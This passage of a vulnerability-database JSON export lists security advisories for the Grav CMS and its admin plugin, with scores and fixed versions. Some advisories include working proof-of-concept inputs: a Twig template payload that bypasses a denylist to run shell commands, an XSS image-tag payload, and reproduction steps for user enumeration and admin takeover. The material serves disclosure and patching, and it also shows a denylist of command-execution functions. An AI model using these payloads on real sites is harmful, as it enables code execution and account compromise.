HSA-7g78-5g5g-mvfj"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-dzhh-3xxa-1ycf"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/30198?fo
rmat=json","vulnerability_id":"VCID-euf5-wt5v-fqaf","summary":"Grav is vulnerable to Stored XSS through authenticated user-edited content\ngrav before v1.7.49.5 has a Stored Cross-Site Scripting (Stored XSS) vulnerability in the page editing functionality. An authenticated low-privileged user with permission to edit content can inject malicious JavaScript payloads into editable fields. The payload is stored on the server and later executed when any other user views or edits the affected page.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66843","reference_id":"","reference_type":"","scores":[{"value":"0.00026","scoring_system":"epss","scoring_elements":"0.0782","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66843"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/Yohane-Mashiro/grav_cve/issues/1","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-16T17:33:18Z/"}],"url":"https://github.com/Yohane-Mashiro/grav_cve/issues/1"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66843","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66843"},{"reference_u
rl":"https://github.com/advisories/GHSA-mh85-44c2-3m97","reference_id":"GHSA-mh85-44c2-3m97","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-mh85-44c2-3m97"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/872248?format=json","purl":"pkg:composer/getgrav/grav@1.8.0-beta.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-19e3-3agd-bbc8"},{"vulnerability":"VCID-1gzk-uead-q7ch"},{"vulnerability":"VCID-1kvz-tbnw-dyev"},{"vulnerability":"VCID-2fzp-f93m-afe3"},{"vulnerability":"VCID-31dk-jdqj-pfag"},{"vulnerability":"VCID-6gtj-f6gc-d3bf"},{"vulnerability":"VCID-91ht-8cax-7kdr"},{"vulnerability":"VCID-9h65-8eka-quhd"},{"vulnerability":"VCID-bdnj-twfh-subp"},{"vulnerability":"VCID-bttg-w7fp-ybd2"},{"vulnerability":"VCID-dzhh-3xxa-1ycf"},{"vulnerability":"VCID-f8zy-fcfc-tfdc"},{"vulnerability":"VCID-fg9g-7eg3-7ygr"},{"vulnerability":"VCID-gcpb-7cu7-q3as"},{"vulnerability":"VCID-ng3h-ees8-vubs"},{"vulnerability":"VCID-swcx-dmqn-2yf9"},{"vulnerability":"VCID-t3bt-hrw2-jya3"},{"vulnerability":"VCID-vp4w-2f8d-vfcf"},{"vulnerability":"VCID-xe66-6nav-c7gy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.1"}],"aliases":["CVE-2025-66843","GHSA-mh85-44c2-3m97"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-euf5-wt5v-fqaf"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/29930?format=json","vulnerability_id":"VCID-f8zy-fcfc-tfdc","summary":"Grav Admin Plugin vulnerable to User Enumeration & Email Disclosure\n# Grav v1.7.49.5 / Admin v1.10.49.1 – User Enumeration & Email Disclosure\n\n### Summary\nA **user enumeration and email disclosure vulnerability** exists in Grav **v1.7.49.5** with Admin plugin **v1.10.49.1**.  
\nThe \"Forgot Password\" functionality at `/admin/forgot` leaks information about valid usernames and their associated email addresses through distinct server responses.  \nThis allows an attacker to enumerate users and disclose sensitive email addresses, which can be leveraged for targeted attacks such as password spraying, phishing, or social engineering.  \n\n### Details\n\nThe issue resides in the [`taskForgot()`](https://github.com/getgrav/grav-plugin-admin/blob/6d673fc7c4f6962756f93ae651371e81f7f20924/classes/plugin/Controllers/Login/LoginController.php#L349) function, which handles the forgot password workflow.  \nRelevant vulnerable logic:\n\n```php\nif (null === $user || $user->state !== 'enabled' || !$to) {\n    ...\n    // Generic message for invalid/non-existing users\n    $this->setMessage($this->translate('PLUGIN_ADMIN.FORGOT_INSTRUCTIONS_SENT_VIA_EMAIL'));\n    return $this->createRedirectResponse($current);\n}\n\nif ($rateLimiter->isRateLimited($username)) {\n    ...\n    $interval = $config->get('plugins.login.max_pw_resets_interval', 2);\n\n    // Sensitive message for valid users\n    $this->setMessage($this->translate('PLUGIN_LOGIN.FORGOT_CANNOT_RESET_IT_IS_BLOCKED', $to, $interval), 'error');\n\n    return $this->createRedirectResponse($current);\n}\n```\n\nWhen an attacker submits the password reset form at `/admin/forgot` with an **invalid username**, the application responds with:  \n\n```\nInstructions to reset your password have been sent to your email address\n```\n\nHowever, when a **valid username** is supplied, and the attacker repeatedly triggers password reset requests, the application responds with:  \n\n```\nCannot reset password for <USER_EMAIL>, password reset functionality temporarily blocked, please try later (maximum 60 minutes)\n```\n\nThis discrepancy in responses enables:  \n1. **User Enumeration** – Attackers can determine if a username exists in the system by analyzing the response.  \n2. 
**User Email Disclosure** – The system discloses the actual email address associated with the account (e.g., `admin@localhost.test`).  \n\nThis violates best practices for authentication flows, where responses should remain generic to avoid leaking sensitive information.\n\n### PoC\n1. Navigate to the **Forgot Password** page:  `https://<target>/admin/forgot`\n1. Submit a reset request with a random/invalid username (e.g., `invalid_user`):  \n\n- Response:  \n  ```\n  Instructions to reset your password have been sent to your email address\n  ```\n3. Submit a reset request with a valid username (e.g., `admin`).  \n4. Repeatedly request a reset for the same username until the lockout mechanism triggers.  \n- Response:  \n  ```\n  Cannot reset password for admin@localhost.test, password reset functionality temporarily blocked, please try later (maximum 60 minutes)\n  ```\n5. Observe the leaked **email address** of the admin account in the error message.  \n\n### Impact\n- **Severity:** Medium  \n- **Type:** Information Disclosure / User Enumeration  \n- **Who is Impacted:** All Grav sites using Admin plugin **v1.10.49.1** with password reset enabled.  \n- **Risks:**  \n  - Allows attackers to enumerate valid usernames.  
\n  - Exposes email addresses of admin accounts, which can be used in:  \n  - Credential stuffing  \n  - Password spraying  \n  - Phishing/social engineering campaigns  \n  - Further exploitation in combination with other vulnerabilities  \n\n\n### Recommendation\n\n- Modify the [`taskForgot()`](https://github.com/getgrav/grav-plugin-admin/blob/6d673fc7c4f6962756f93ae651371e81f7f20924/classes/plugin/Controllers/Login/LoginController.php#L349) logic to always return a generic, non-identifying message, regardless of whether the username exists or rate limits are hit.\n\n- Example safe response:\n  ```ini\n  If the account exists, password reset instructions will be sent.\n  ```\n\n- Do not include email addresses ($to) or other sensitive data in error messages.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66307","reference_id":"","reference_type":"","scores":[{"value":"0.00059","scoring_system":"epss","scoring_elements":"0.18701","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66307"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav-plugin-admin/blob/6d673fc7c4f6962756f93ae651371e81f7f20924/classes/plugin/Controllers/Login/LoginController.php#L349","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav-plugin-admin/blob/6d673fc7c4f6962756f93ae651371e81f7f20924/classes/plugin/Controllers/Login/LoginController.php#L349"},{"reference_url":"https://g
ithub.com/getgrav/grav-plugin-admin/commit/99f653296504f1d6408510dd2f6f20a45a26f9b0","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-12-02T20:07:49Z/"}],"url":"https://github.com/getgrav/grav-plugin-admin/commit/99f653296504f1d6408510dd2f6f20a45a26f9b0"},{"reference_url":"https://github.com/getgrav/grav/security/advisories/GHSA-q3qx-cp62-f6m7","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-12-02T20:07:49Z/"}],"url":"https://github.com/getgrav/grav/security/advisories/GHSA-q3qx-cp62-f6m7"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66307","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66307"},{"reference_url":"https://github.com/advisories/GHSA-q3qx-cp62-f6m7","reference_id":"GHSA-q3qx-cp62-f6m7","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-q3qx-cp62-f6m7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/63161?format=json","purl":"pkg:composer/getgrav/grav@1.8.0-beta.27","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2fzp-f
93m-afe3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27"}],"aliases":["CVE-2025-66307","GHSA-q3qx-cp62-f6m7"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-f8zy-fcfc-tfdc"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/30050?format=json","vulnerability_id":"VCID-fg9g-7eg3-7ygr","summary":"Grav vulnerable to Privilege Escalation in Grav Admin: Missing Username Uniqueness Check Allows Admin Account Takeover\n### Summary\nA privilege escalation vulnerability exists in Grav’s Admin plugin due to the absence of username uniqueness validation when creating users.\nA user with the create user permission can create a new account using the same username as an existing administrator account, set a new password/email, and then log in as that administrator. This effectively allows privilege escalation from limited user-manager permissions to full administrator access.\n\n\n### Steps to Reproduce\n1. Make sure you have two accounts: an admin and a user with create user privilege\n2. In the user account, navigate to /grav-admin/admin/accounts/users and click \"Add\"\n3. Enter the name of the admin, complete registration and observe that the existing admin’s email is changed to the value you provided.\n4. Log out of the user account and log in as admin with the new credentials\n\n\n### Impact\n1. Full admin takeover by any user with create user permission.\n2. Ability to change admin credentials, install/remove plugins, read or modify site data, and execute any action available to an admin.\n3. 
Severity: High/Critical.\n\n\n### PoC\nhttps://github.com/user-attachments/assets/3ab0a7d6-5055-41be-9e0e-2bd6ca359b37","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66296","reference_id":"","reference_type":"","scores":[{"value":"0.00062","scoring_system":"epss","scoring_elements":"0.19604","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66296"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav/commit/3462d94d575064601689b236508c316242e15741","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-12-02T14:05:57Z/"}],"url":"https://github.com/getgrav/grav/commit/3462d94d575064601689b236508c316242e15741"},{"reference_url":"https://github.com/getgrav/grav/security/advisories/GHSA-cjcp-qxvg-4rjm","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-12-02T14:05:57Z/"}],"url":"https://github.com/getgrav/grav/security/advisories/GHSA-cjcp-qxvg-4rjm"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66296","reference_id":"","reference_type":"","s
cores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66296"},{"reference_url":"https://github.com/advisories/GHSA-cjcp-qxvg-4rjm","reference_id":"GHSA-cjcp-qxvg-4rjm","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cjcp-qxvg-4rjm"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/63161?format=json","purl":"pkg:composer/getgrav/grav@1.8.0-beta.27","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2fzp-f93m-afe3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27"}],"aliases":["CVE-2025-66296","GHSA-cjcp-qxvg-4rjm"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-fg9g-7eg3-7ygr"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/38542?format=json","vulnerability_id":"VCID-g8rq-2ss6-3kcu","summary":"grav Server-side Template Injection (SSTI) mitigation bypass\n### Summary\nThe fix for SSTI using `|map`, `|filter` and `|reduce` twigs implemented in the commit [71bbed1](https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b) introduces a bypass of the denylist due to an incorrect return value from `isDangerousFunction()`, which allows the payload to be executed by prepending a double backslash (`\\\\`) \n\n### Details\nThe `isDangerousFunction()` check in version 1.7.42 and onwards returns `false` instead of `true` when the `\\` symbol is found in the `$name`.\n\n```php\n...\n        if (strpos($name, \"\\\\\") !== false) {\n            return false;\n        }\n\n        if (in_array($name, $commandExecutionFunctions)) {\n            return true;\n        }\n...\n```\nBased on the 
code where the function is used, it is expected that any dangerous condition would return `true`\n```php\n    /**\n     * @param Environment $env\n     * @param array $array\n     * @param callable|string $arrow\n     * @return array|CallbackFilterIterator\n     * @throws RuntimeError\n     */\n    function mapFunc(Environment $env, $array, $arrow)\n    {\n        if (!$arrow instanceof \\Closure && !is_string($arrow) || Utils::isDangerousFunction($arrow)) {\n            throw new RuntimeError('Twig |map(\"' . $arrow . '\") is not allowed.');\n\t}\n```\nwhen `|map('\\system')` is used in the malicious payload, the single backslash is dropped prior to reaching `strpos($name, '\\\\')` check, thus `$name` variable already has no backslash, and the command is blacklisted because it reaches the  `if (in_array($name, $commandExecutionFunctions)) {` validation step. \n\nHowever if `|map('\\\\system')` is used (i.e. double backslash), then the `strpos($name, \"\\\\\") !== false` takes effect, and `isDangerousFunction()` returns `false` , in which case the `RuntimeError` is not generated, and blacklist is bypassed leading to code execution.\n\n### Exploit Conditions\nThis vulnerability can be exploited if the attacker has access to:\n\n1. an Administrator account, or\n2. a non-administrator, user account that has Admin panel access and Create/Update page permissions\n\n### Steps to reproduce\n\n1. Log in to Grav Admin using an administrator account.\n2. Navigate to `Accounts > Add`, and ensure that the following permissions are assigned when creating a new low-privileged user: \n    - Login to Admin - Allowed\n    - Page Update - Allowed\n3. Log out of Grav Admin\n4. Login using the account created in step 2.\n5. Choose `Pages -> Home`\n6. Click the `Advanced` tab and select the checkbox beside `Twig` to ensure that Twig processing is enabled for the modified webpage.\n7. 
Under the `Content` tab, insert the following payload within the editor:\n```{{ ['id'] | map('\\\\system') | join() }}```\n8. Click the `Preview` button. Observe that the output of the id shell command is returned in the preview.\n\n### Mitigation\n\n```diff\ndiff --git a/system/src/Grav/Common/Utils.php b/system/src/Grav/Common/Utils.php\nindex 2f121bbe3..7b267cd0f 100644\n--- a/system/src/Grav/Common/Utils.php\n+++ b/system/src/Grav/Common/Utils.php\n@@ -2069,7 +2069,7 @@ abstract class Utils\n         }\n \n         if (strpos($name, \"\\\\\") !== false) {\n-            return false;\n+            return true;\n         }\n \n         if (in_array($name, $commandExecutionFunctions)) {\n                                                                         \n```","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-37897","reference_id":"","reference_type":"","scores":[{"value":"0.00118","scoring_system":"epss","scoring_elements":"0.30315","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-37897"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-10-18T16:06:14Z/"}],"url":"https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b"},{"reference_url":"https://github.com/getgrav/
grav/commit/b4c62101a43051fc7f5349c7d0a5b6085375c1d7","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-10-18T16:06:14Z/"}],"url":"https://github.com/getgrav/grav/commit/b4c62101a43051fc7f5349c7d0a5b6085375c1d7"},{"reference_url":"https://github.com/getgrav/grav/security/advisories/GHSA-9436-3gmp-4f53","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-10-18T16:06:14Z/"}],"url":"https://github.com/getgrav/grav/security/advisories/GHSA-9436-3gmp-4f53"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-37897","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-37897"},{"reference_url":"https://github.com/advisories/GHSA-9436-3gmp-4f53","reference_id":"GHSA-9436-3gmp-4f53","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-9436-3gmp-4f53"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/625481?format=json","purl":"pkg:composer/getgrav/grav@1.7.42.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-13tt-ebbj-eyg8"},{"vulnerability":"VCID-19e3-3agd-bbc8"},{"vulnerability":"VCID-1gzk-uead-q7ch"},{"vulnerability":"VCID-1kvz-tbnw-dyev"},{"vulnerability":"VCID-2fzp-f93m-afe3"},{"vulnerability":"VCID-31dk-jdqj-p
fag"},{"vulnerability":"VCID-47rc-kqnw-7ue8"},{"vulnerability":"VCID-6gtj-f6gc-d3bf"},{"vulnerability":"VCID-91ht-8cax-7kdr"},{"vulnerability":"VCID-9h5a-h26f-cudw"},{"vulnerability":"VCID-9h65-8eka-quhd"},{"vulnerability":"VCID-bdnj-twfh-subp"},{"vulnerability":"VCID-bttg-w7fp-ybd2"},{"vulnerability":"VCID-dmbe-mmj8-3baa"},{"vulnerability":"VCID-dmh7-xvmg-27ef"},{"vulnerability":"VCID-dzhh-3xxa-1ycf"},{"vulnerability":"VCID-euf5-wt5v-fqaf"},{"vulnerability":"VCID-f8zy-fcfc-tfdc"},{"vulnerability":"VCID-fg9g-7eg3-7ygr"},{"vulnerability":"VCID-gcpb-7cu7-q3as"},{"vulnerability":"VCID-hdsp-4e4r-c3fh"},{"vulnerability":"VCID-hwcx-1fp9-3bhh"},{"vulnerability":"VCID-ng3h-ees8-vubs"},{"vulnerability":"VCID-p24p-fcpe-xbah"},{"vulnerability":"VCID-rurt-s65k-1yfk"},{"vulnerability":"VCID-swcx-dmqn-2yf9"},{"vulnerability":"VCID-t3bt-hrw2-jya3"},{"vulnerability":"VCID-ugn8-e63y-1fes"},{"vulnerability":"VCID-v5ah-z3uv-fbet"},{"vulnerability":"VCID-vp4w-2f8d-vfcf"},{"vulnerability":"VCID-xe66-6nav-c7gy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.42.2"},{"url":"http://public2.vulnerablecode.io/api/packages/71648?format=json","purl":"pkg:composer/getgrav/grav@1.7.42%2B2","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.42%252B2"}],"aliases":["CVE-2023-37897","GHSA-9436-3gmp-4f53"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-g8rq-2ss6-3kcu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/30410?format=json","vulnerability_id":"VCID-gcpb-7cu7-q3as","summary":"Grav is vulnerable to Cross-Site Scripting (XSS) Reflected endpoint /admin/pages/[page], parameter data[header][content][items], located in the \"Blog Config\" tab\n## Summary\n\nA Reflected Cross-Site Scripting (XSS) vulnerability was identified in the `/admin/pages/[page]` endpoint of 
the _Grav_ application. This vulnerability allows attackers to inject malicious scripts into the `data[header][content][items]` parameter.\n\n---\n\n## Details\n\n**Vulnerable Endpoint:** `GET /admin/pages/[page]`  \n**Parameter:** `data[header][content][items]`\n\nThe application fails to properly validate and sanitize user input in the `data[header][content][items]` parameter. As a result, attackers can craft a malicious URL with an XSS payload. When this URL is accessed, the injected script is reflected back in the HTTP response and executed within the context of the victim's browser session.\n\n---\n\n## PoC\n\n**Payload:**\n\n`\"><ImG sRc=x OnErRoR=alert('XSS-PoC3')>`\n\n1. Log in to the _Grav_ Admin Panel and navigate to **Pages**.\n    \n2. Create a new page or edit an existing one.\n    \n3. In the **Advanced > Blog Config > Items** field (which maps to `data[header][content][items]`), insert the payload above.\n\n![image](https://github.com/user-attachments/assets/ae77d92a-2e09-4b67-b3ae-5e317b9d518f)\n\n4. Save the page.\n     \n5. The malicious payload is reflected and rendered by the application without proper sanitization. 
The JavaScript code is immediately executed in the browser.\n\n![image](https://github.com/user-attachments/assets/328b0714-750a-421d-ad5e-ea7f148dca8f)\n\n---\n\n## Impact\n\nReflected cross-site scripting (XSS) attacks can have serious consequences, including:\n\n- **User actions:** Attackers can perform actions on behalf of the user\n    \n- **Data theft:** Sensitive information such as session cookies can be stolen\n    \n- **Account compromise:** Attackers may impersonate legitimate users\n    \n- **Malicious code execution:** Arbitrary JavaScript code can run in the user’s browser\n    \n- **Website defacement or misinformation:** Malicious output may be injected visually\n    \n- **User redirection:** Victims may be redirected to phishing or malicious websites\n\nby [CVE-Hunters](https://github.com/Sec-Dojo-Cyber-House/cve-hunters)","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66309","reference_id":"","reference_type":"","scores":[{"value":"0.00032","scoring_system":"epss","scoring_elements":"0.09658","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66309"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav-plugin-admin/commit/99f653296504f1d6408510dd2f6f20a45a26f9b0","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T16:12:10Z/"}],"url":
"https://github.com/getgrav/grav-plugin-admin/commit/99f653296504f1d6408510dd2f6f20a45a26f9b0"},{"reference_url":"https://github.com/getgrav/grav/security/advisories/GHSA-65mj-f7p4-wggq","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T16:12:10Z/"}],"url":"https://github.com/getgrav/grav/security/advisories/GHSA-65mj-f7p4-wggq"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66309","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66309"},{"reference_url":"https://github.com/advisories/GHSA-65mj-f7p4-wggq","reference_id":"GHSA-65mj-f7p4-wggq","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-65mj-f7p4-wggq"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/63161?format=json","purl":"pkg:composer/getgrav/grav@1.8.0-beta.27","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2fzp-f93m-afe3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27"}],"aliases":["CVE-2025-66309","GHSA-65mj-f7p4-wggq"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-gcpb-7cu7-q3as"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/11839?format=json","vulnerability_id"
